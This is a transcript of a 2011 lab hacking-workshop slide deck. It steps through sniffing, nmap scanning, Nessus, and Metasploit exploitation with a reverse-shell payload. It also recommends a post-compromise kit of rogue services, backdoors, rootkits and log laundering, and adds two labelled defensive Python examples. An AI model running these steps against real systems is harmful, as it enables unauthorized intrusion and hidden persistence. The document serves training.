Pwnage Workshop Beta 8 14 2011

Transcript of Pwnage Workshop Beta 8 14 2011

  • 8/3/2019 Pwnage Workshop Beta 8 14 2011

    1/81

    Pwnage Workshop

    From zero to hero Level 1 ScriptKiddie

    Table of contents

    Legal

    Overview

    Requirements

    Entering the Lab

    The scenario

    5 intro to backtrack

    Let's get started

    Legal

    To be able to join this workshop you have to agree that you are completely responsible for what you do after you leave this room. We encourage you: don't use these tools and techniques to be evil.

    Overview

    This workshop is set in the early 2000s. Our aim is to teach you some hacking techniques, from basic networking to exploiting machines, through a hands-on workshop.

    Enjoy!

    Requirements

    Human:

    1. Basic Microsoft Windows knowledge

    2. Basic Linux knowledge

    3. Basic VMware knowledge

    4. Basic networking knowledge

    5. Patience

    6. Respect

    7. Then GOTO 5

    Hardware:

    Computer/Laptop

    2+ GB RAM

    Ethernet AND Wireless access

    Software:

    VMware

    Virtualized version of Backtrack

    Entering the Lab

    Identify your Ethernet LAN network.

    Disable LAN TCP/IPv4 & IPv6.

    Open VMware Virtual Network Editor.

    Identify or create a network and bridge it with your Ethernet LAN.

    Just plug your Ethernet cable into the designated switch.

    Entering the Lab

    Go to your Backtrack virtual machine and right-click on the networking icon at the bottom right.

    Select Custom, and select the name of the network bridged to the LAN.

    Storyline

    The scenario

    What you know: There should be something behind the switch.

    What you don't know: Everything else.

    5 intro to backtrack

    The /pentest/ directory

    Most of the programs can be run from the shell

    The desktop (run startx on terminal)

    See multiple terminals at the same time, and also for running Maltego

    5 intro to backtrack

    Finding tools

    The $PATH

    echo $PATH

    The find command

    root@bt:~# find / -name nmap

    root@bt:~# find /pentest/ -name '*.dic'

    Terminate running program

    Control + C

    And of course TAB for autocompletion and the arrow keys to reuse your previously typed commands

    Let's get started

    Challenge 1: Obtain IP address.

    Challenge 2: Detect/Define our victim.

    Challenge 3: Service recognition.

    Challenge 4: Vulnerability detection.

    Challenge 5: Exploiting vulnerability.

    Challenge 6: Gain remote access.

    Challenge 7: Remote network recognition.

    Challenge 8: Exploiting Remote machines.

    Challenge 1: Obtain IP address.

    So you are in the middle of who knows where, you just plugged in your cable and nothing happened. What can we do?

    Logging in to Backtrack

    For user and password, read the welcome screen in BT

    Bringing up your Ethernet interface.

    ifconfig eth0 up

    Assigning the right IP address to your PC.

    First we listen

    To obtain a valid IP address, we can listen to the network and see whether it gives us some hint of which IP range is the right one.

    Intro to Network Sniffers

    What are sniffers?

    Promiscuous mode

    Sniffing with tcpdump

    Intro to Network Sniffers

    What are sniffers?

    Promiscuous mode

    Sniffing with tcpdump

    List devices

    root@bt:~# tcpdump -D

    1.eth0

    2.usbmon1 (USB bus number 1)

    3.any (Pseudo-device that captures on all interfaces)

    4.lo

    Select the right device and start listening

    root@bt:~# tcpdump -i eth0

    tcpdump: WARNING: eth0: no IPv4 address assigned

    tcpdump: verbose output suppressed, use -v or -vv for full protocol decode

    listening on eth0, link-type EN10MB (Ethernet), capture size 96 bytes

    See something? See too much? Try filters

    root@bt:~# tcpdump -n arp -i eth0

    root@bt:~# tcpdump -n tcp -i eth0

    root@bt:~# tcpdump -n tcp and dst port 23 -i eth0

    You found the right IP range!!!

    Set up your IP address

    root@bt:~# ifconfig eth0 192.168.1.6/24

    Challenge 2: Detect/Define our victim.

    The art of scanning:

    What is scanning

    Ping? Pong!

    Dissection of a scan, one packet at a time.

    Netcat, nmap, amap

    What is scanning

    Ping? Pong!

    Ping sweep: A method that can establish a range of IP addresses which map to live hosts.

    Example: nmap -sn 192.168.69.0/24

    Starting Nmap 5.35DC1 ( http://nmap.org ) at 2011-07-14 15:58 EDT

    Nmap scan report for 192.168.69.1

    Host is up (0.0031s latency).

    MAC Address: 00:21:29:AA:A6:89 (Cisco-Linksys)

    Nmap scan report for 192.168.69.104

    Host is up (0.0023s latency).

    MAC Address: 00:50:43:6A:20:2B (Marvell Semiconductor)

    Nmap scan report for 192.168.69.145

    Host is up.

    Nmap done: 256 IP addresses (3 hosts up) scanned in 3.48 second

    Dissection of a ping sweep, one packet at a time.

    Wireshark: View of a Ping sweep
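
    Seen from the defending side, this sweep stands out in the same `tcpdump -n arp` output used in Challenge 1: on a local Ethernet segment Nmap's host discovery sends ARP requests, so a single sender asks who-has for nearly every address of the /24 within a few seconds. The following is an added example, not part of the original slides; the function names, the thresholds and the capture lines are constructed for illustration, and timestamps are assumed not to cross midnight.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# An ARP request as printed by `tcpdump -n arp`.
ARP_REQ = re.compile(
    r"^(?P<ts>\d{2}:\d{2}:\d{2}\.\d+) ARP, Request who-has "
    r"(?P<target>\d+\.\d+\.\d+\.\d+)(?: \([0-9A-Fa-f:]+\))? "
    r"tell (?P<sender>\d+\.\d+\.\d+\.\d+)"
)


def find_arp_sweeps(lines, min_targets=20, window_seconds=5.0):
    """Return {sender_ip: most distinct targets seen in any window} for
    senders that asked for at least `min_targets` addresses in one window."""
    requests = defaultdict(list)  # sender -> [(timestamp, target)]
    for line in lines:
        m = ARP_REQ.match(line.strip())
        if m:
            ts = datetime.strptime(m["ts"], "%H:%M:%S.%f")
            requests[m["sender"]].append((ts, m["target"]))

    window = timedelta(seconds=window_seconds)
    sweeps = {}
    for sender, reqs in requests.items():
        reqs.sort()
        in_window = defaultdict(int)  # target -> requests inside the window
        start = best = 0
        for ts, target in reqs:
            in_window[target] += 1
            # Slide the left edge until the window is short enough again.
            while ts - reqs[start][0] > window:
                old = reqs[start][1]
                in_window[old] -= 1
                if in_window[old] == 0:
                    del in_window[old]
                start += 1
            best = max(best, len(in_window))
        if best >= min_targets:
            sweeps[sender] = best
    return sweeps


def constructed_capture():
    """Constructed sample: .145 sweeps 192.168.69.0/24 while .104 makes
    one ordinary lookup for the gateway."""
    lines = []
    for host in range(1, 255):
        if host == 145:  # a scanner does not ask for its own address
            continue
        ms = host * 10  # one request every 10 ms
        lines.append(
            "15:58:%02d.%03d000 ARP, Request who-has 192.168.69.%d "
            "tell 192.168.69.145, length 28" % (1 + ms // 1000, ms % 1000, host))
    lines.append("15:58:02.500000 ARP, Request who-has 192.168.69.1 "
                 "tell 192.168.69.104, length 46")
    lines.append("15:58:02.500400 ARP, Reply 192.168.69.1 is-at "
                 "00:21:29:aa:a6:89, length 46")
    return lines


if __name__ == "__main__":
    print(find_arp_sweeps(constructed_capture()))
```

    The ordinary lookup from .104 stays far below the threshold, so only the sweeping sender is reported.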

    Now it's your turn: find your victim.

    Challenge 3: Service recognition.

    Ports & port scanning.

    Services

    What are services

    Detecting services

    Banner recognition

    Ports

    Port: A port is an application-specific communications endpoint. It is used by the transport protocols of the Internet Protocol Suite, such as Transmission Control Protocol (TCP) and User Datagram Protocol (UDP).

    The port numbers are divided into three ranges: the Well Known Ports, the Registered Ports, and the Dynamic and/or Private Ports.

    The Well Known Ports are those from 0 through 1023. (ftp, telnet, tftp)

    The Registered Ports are those from 1024 through 49151 (socks , ms-sql, mysql)

    The Dynamic and/or Private Ports are those from 49152 through 65535

    TCP & UDP

    http://www.iana.org/assignments/port-numbers

    Port Scanning

    root@bt:~# nmap -n -p1-65535 192.168.69.104

    Starting Nmap 5.35DC1 ( http://nmap.org ) at 2011-07-17 15:07 EDT

    Nmap scan report for 192.168.69.104

    Host is up (0.041s latency).

    Not shown: 65533 closed ports

    PORT STATE SERVICE

    22/tcp open ssh

    80/tcp open http

    MAC Address: 00:50:43:6A:20:2B (Marvell Semiconductor)

    Nmap done: 1 IP address (1 host up) scanned in 37.48 seconds

    Wireshark port scan capture

    3-way handshake

    Services:

    Some services:

    SSH, DHCP, DNS, authentication, proxy, email, web, SNMP, FTP, TFTP

    Banner recognition

    root@bt:~# nmap -n -p22 -sV 192.168.69.104

    Starting Nmap 5.35DC1 ( http://nmap.org ) at 2011-07-17 15:40 EDT

    Nmap scan report for 192.168.69.104

    Host is up (0.0020s latency).

    PORT STATE SERVICE VERSION

    22/tcp open ssh OpenSSH 5.1p1 Debian 8 (protocol 2.0)

    MAC Address: 00:50:43:6A:20:2B (Marvell Semiconductor)

    Service Info: OS: Linux

    Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .

    Nmap done: 1 IP address (1 host up) scanned in 0.17 seconds

    Wireshark service detection capture

    Closing chapter 3

    After you get the results, let's build a general picture from them:

    How many machines?

    Which OSs?

    Which ports?

    Which services?

    Which software?

    Are they server or desktop machines?
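
    Answering this checklist by hand gets error-prone once several reports pile up, so here is one way to merge saved Nmap reports into a per-host inventory. This is an added example, not part of the original slides; the function names are made up for it, the sample text is constructed from the two reports shown above, and the "well known listener" flag is a heuristic assumed here, not a rule from the workshop.

```python
import re

REPORT = re.compile(r"^Nmap scan report for (?:\S+ \()?(\d+\.\d+\.\d+\.\d+)\)?$")
PORT = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)(?:\s+(.+))?$")
MAC = re.compile(r"^MAC Address: ([0-9A-Fa-f:]{17})(?: \((.+)\))?$")
OS_INFO = re.compile(r"^Service Info:.*?\bOSs?: ([^;]+)")

# Constructed sample: the port scan and the -sV report shown on the slides,
# concatenated the way they would sit in one saved log.
SAMPLE = """\
Nmap scan report for 192.168.69.104
Host is up (0.041s latency).
Not shown: 65533 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
MAC Address: 00:50:43:6A:20:2B (Marvell Semiconductor)
Nmap scan report for 192.168.69.104
Host is up (0.0020s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 5.1p1 Debian 8 (protocol 2.0)
MAC Address: 00:50:43:6A:20:2B (Marvell Semiconductor)
Service Info: OS: Linux
"""


def parse_nmap_normal(text):
    """Merge one or more normal-format Nmap reports into {ip: record}."""
    hosts, cur = {}, None
    for line in map(str.strip, text.splitlines()):
        m = REPORT.match(line)
        if m:
            cur = hosts.setdefault(
                m.group(1), {"mac": None, "vendor": None, "os": None, "ports": {}})
            continue
        if cur is None:
            continue
        if (m := PORT.match(line)):
            port, proto, state, service, version = m.groups()
            entry = cur["ports"].setdefault((int(port), proto), {"version": None})
            entry["state"], entry["service"] = state, service
            # A later plain scan must not erase a version found by -sV.
            entry["version"] = version.strip() if version else entry["version"]
        elif (m := MAC.match(line)):
            cur["mac"], cur["vendor"] = m.groups()
        elif (m := OS_INFO.match(line)):
            cur["os"] = m.group(1).strip()
    return hosts


def summarize(hosts):
    """Answer the checklist: how many machines, which OS, ports, software."""
    out = {"machines": len(hosts), "hosts": {}}
    for ip, h in sorted(hosts.items()):
        opened = sorted(k for k, e in h["ports"].items() if e["state"] == "open")
        out["hosts"][ip] = {
            "os": h["os"],
            "open_ports": ["%d/%s" % k for k in opened],
            "software": {"%d/%s" % k: h["ports"][k]["version"]
                         or h["ports"][k]["service"] for k in opened},
            # Heuristic assumed by this example, not a rule from the slides:
            # listening on Well Known Ports (0-1023) suggests a server role.
            "well_known_listener": any(port <= 1023 for port, _ in opened),
        }
    return out


if __name__ == "__main__":
    print(summarize(parse_nmap_normal(SAMPLE)))
```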

    2 Free TIPs

    Browsing the services

    Browse 2 common services with their corresponding client

    Use netcat to connect to the services

    Why don't we try to recognize the OS running on each machine?

    Try:

    nmap -O host

    Challenge 4: Vulnerability detection.

    What are vulnerabilities

    IETF RFC 2828 defines vulnerability as:

    A flaw or weakness in a system's design, implementation, or operation and management that could be exploited to violate the system's security policy

    Playing with Nessus

    What is Nessus

    Installing Nessus on Backtrack

    Creating policies

    Understanding the results

    Playing with Nessus

    What is Nessus

    It is a vulnerability scanner, bla bla bla.

    Installing Nessus on Backtrack

    We are going to connect our Backtrack machine to the public internet in order to retrieve Nessus from its home site.

    Unbridge and bridge to your wireless

    dhcpclient

    Nessus.org register (as home user)

    Obtain your code (check inbox)

    Paste the command in a shell

    Go to create user

    Rebridge to your Ethernet

    Reset to your first IP

    Nessus start

    Browse to https://yourip:8834

    Playing with Nessus

    What is Nessus

    Installing Nessus on Backtrack

    Creating policies

    The Nessus interface is fairly intuitive. Take 5 minutes to create your own policy (keep in mind the results from the previous stages).

    Once you have done that, please don't forget to also include the following plugins:

    CGI abuses

    RPC

    Web Servers

    Windows

    Playing with Nessus

    Installing Nessus on backtrack

    Creating policies

    Understanding the results

    If results != 0, then go read them; again, take your time.

    From the results, which machines are vulnerable?

    Challenge 5: Exploiting vulnerability.

    Creating your hack-kit

    Using exploits:

    Simple exploits

    The Metasploit framework

    Creating your hack-kit

    The hack-kit is your own set of tools for backdooring/administering/protecting your new server, which you upload after you break into a server.

    In general you would like to upload:

    Process/services tools: List/kill processes.

    File transfer tools: Normally an FTP.

    Administration tools: Access to remote desktop.

    Covering tracks: Log laundering.

    Hiding your stuff: Rootkits.

    Maintaining access: Backdoors.

    Expansion tools: scanners and more exploits.

    Hardening: Patches, Service Packs.

    Proposed tools

    Listing/killing processes and port scanning.

    These tools let you see from the command line what is running on the remote server, as well as start remote reconnaissance.

    Fport.exe Fport 2.0

    KILL.EXE

    TLIST.EXE

    dfind.exe

    Client/Administration tools:

    Let you remotely administer your rogue services

    Remote administrator 2.1

    Serv-u administrator 3

    Rogue FTP server

    Simple and powerful FTP server

    WINMGNT.EXE

    ServUDaemon.ini

    Rogue Remote Administration tool

    If you want remote desktop, here is a solution; telnet and file transfer capabilities are included as well

    AdmDll.dll

    r_server.exe

    raddrv.dll

    settings.reg

    How to use the tools.

    Installing rogue services

    The important capability of these rogue services is that they can be installed as services, and from the command line.

    So once you are in the remote shell, transfer your hack-kit (pack.exe) and run the following commands

    What are exploits.

    Why they are funny.

    Where you can find them.

    How to use them.

    Compiling

    Testing

    executing

    What are exploits.

    An exploit is a piece of software, a chunk of data, or sequence of commands that takes advantage of a bug, glitch or vulnerability in order to cause unintended or unanticipated behavior to occur on computer software, hardware, or something electronic. This frequently includes such things as gaining control of a computer system, allowing privilege escalation or a denial of service attack.

    Types

    Exploits are commonly categorized and named by these criteria:

    The type of vulnerability they exploit

    Whether they need to be run on the same machine as the program that has the vulnerability (local) or can be run on one machine to attack a program running on another machine (remote).

    The result of running the exploit (Remote access, privilege escalation, DoS, data leak, etc.)

    What are exploits.

    Why they are funny.

    Because they could give us unauthorized access to something (data, remote machine, and/or become administrator).

    What an exploit looks like.

    Meanwhile, in a very very very secure server

    Back to our very very very secure server.

    Well, thanks for the info. You bad service, spat out a file and then went to sleep?

    COMMON

    What are exploits.

    Why they are funny.

    Where you can find them.

    Where you can find them.

    There are multiple sites; one of them is exploit-db.com, with a huge list of exploits for many software packages.

    Some other things about exploits:

    Public exploits vs private exploits.

    Open source vs closed/compiled ones.

    Protected, fake, booby-trapped and rootkitted ones.

    And we also have Metasploit.

    What are exploits.

    Why they are funny.

    Where you can find them.

    How to use them.

    Compiling

    Testing

    executing

    Using Metasploit

    Setting up Metasploit to attack a machine: select the exploit, the victim, and what you want to do on that machine; profit.

    First, you have to know the module name (it's in the Nessus output)

    Run Metasploit

    /pentest/exploits/framework3/msfconsole

    Search for the exploit

    show exploits

    Start using the exploit

    info windows/iis/ms01_026_dbldecode

    use windows/iis/ms01_026_dbldecode

    Ask for the config

    show options

    Minimum requirements

    set RHOST 192.168.1.11

    Set the payload

    set payload /generic/shell_reverse_tcp

    Ask for the config

    set LHOST YOURIP

    Exploit!

    NOW WHAAAAAAAAAAAAAAAAAAAATTTTTTT

    Challenge 6: Gain remote access.

    You hacked it, right, now what?

    Installing channels or something: remote administrator, serv-u, netcat

    Challenge 7: Remote network recognition.

    We have to go deeper

    Scanning the LAN

    Here we are going to use a tool from our hack-kit, dfind

    Challenge 8: Exploiting Remote machines.

    So you detected some machines, you detected some services, now it's time to exploit them.

    What tools can we use to exploit remote vulnerabilities?

    Exploiting remote Windows Machines

    Analyzing dfind results

    Searching for available vulnerability info

    Prepare the exploit

    Profit

    Exploiting remote Linux Machines

    Analyzing dfind results

    Searching for available vulnerability info

    Prepare the exploit

    Profit

    Once you have one

    Man-in-the-middle attacks (ettercap)

    DNS poisoning

    Exploiting browsers

    Super Secret Network Topology

    Machines and their vulnerabilities

    Exploiting Windows NT 4 from Nessus to Metasploit. (IIS)

    Red Hat 6.2 7350wu.c Wu-ftpd v2.6.0 remote root exploit.

    Backtrack Nessus Metasploit autopwn: KABOOM!!! Hacking Windows 2000.

    Challenge List

    Challenge 1: Obtain IP address.

    Challenge 2: Detect/Define our victim.

    Challenge 3: Service recognition.

    Challenge 4: Vulnerability detection.

    Challenge 5: Exploiting vulnerability.

    Challenge 6: Gain remote access.

    Challenge 7: Remote network recognition.

    Challenge 8: Exploiting Remote machines.